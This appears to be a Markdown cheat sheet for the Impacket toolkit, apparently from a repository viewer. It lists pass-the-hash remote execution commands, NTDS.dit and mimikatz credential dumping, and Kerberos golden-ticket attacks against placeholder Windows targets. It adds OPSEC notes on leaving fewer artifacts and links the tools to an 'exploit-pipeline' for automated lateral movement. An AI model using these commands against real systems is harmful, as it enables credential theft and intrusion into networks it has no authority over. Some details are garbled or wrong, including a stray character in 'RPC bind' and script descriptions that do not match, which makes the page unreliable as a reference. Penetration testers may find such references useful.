Hermes Agent
71 lines
1.5 KiB
Markdown
71 lines
1.5 KiB
Markdown
# Impacket Usage Reference
|
|
|
|
## Overview
|
|
|
|
Impacket is a collection of Python classes for working with network protocols. Core tool for Windows pentesting.
|
|
|
|
## Installation
|
|
|
|
```bash
|
|
pip install impacket
|
|
# Or from source:
|
|
git clone https://github.com/fortra/impacket
|
|
cd impacket && pip install .
|
|
```
|
|
|
|
## Key Scripts
|
|
|
|
### Remote Execution
|
|
|
|
```bash
|
|
# psexec.py - Pass-the-Hash
|
|
python3 psexec.py DOMAIN/user@target.lan -hashes lm:ntlm
|
|
|
|
# wmiexec.py - Stealth WMI exec
|
|
python3 wmiexec.py DOMAIN/user@target.lan -hashes lm:ntlm
|
|
|
|
# atexec.py - Scheduled task exec
|
|
python3 atexec.py DOMAIN/user@target.lan -hashes lm:ntlm
|
|
```
|
|
|
|
### Credential Extraction
|
|
|
|
```bash
|
|
# secretsdump.py - NTDS.dit extraction
|
|
python3 secretsdump.py DOMAIN/user@target.lan -hashes lm:ntlm
|
|
|
|
# mimikatz.py - Remote mimikatz
|
|
python3 mimikatz.py DOMAIN/user@target.lan -hashes lm:ntlm
|
|
```
|
|
|
|
### Kerberos Attacks
|
|
|
|
```bash
|
|
# getTGT.py - Ticket extraction
|
|
python3 getTGT.py DOMAIN/user:password
|
|
|
|
# goldenPac.py - Golden ticket + auto-exec
|
|
python3 goldenPac.py DOMAIN/user@target.lan
|
|
```
|
|
|
|
### Network Discovery
|
|
|
|
```bash
|
|
# smbclient.py - Anonymous SMB share browsing
|
|
python3 smbclient.py DOMAIN/user@target.lan
|
|
|
|
# rpcclient.py - RPC bind蔷
|
|
python3 rpcclient.py target.lan -N
|
|
```
|
|
|
|
## OPSEC Notes
|
|
|
|
- wmiExec leaves fewer artifacts than psexec
|
|
- Use -dc-ip for Kerberoasting
|
|
- secretsdump requires domain admin or NTDS.dit access
|
|
- Always check firewall rules before port scanning
|
|
|
|
## GreySec Engagement Notes
|
|
|
|
Used in: `exploit-pipeline` for lateral movement automation.
|
|
See: https://gsfiles.tail57cd.ts.net/greysec/exploit-pipeline |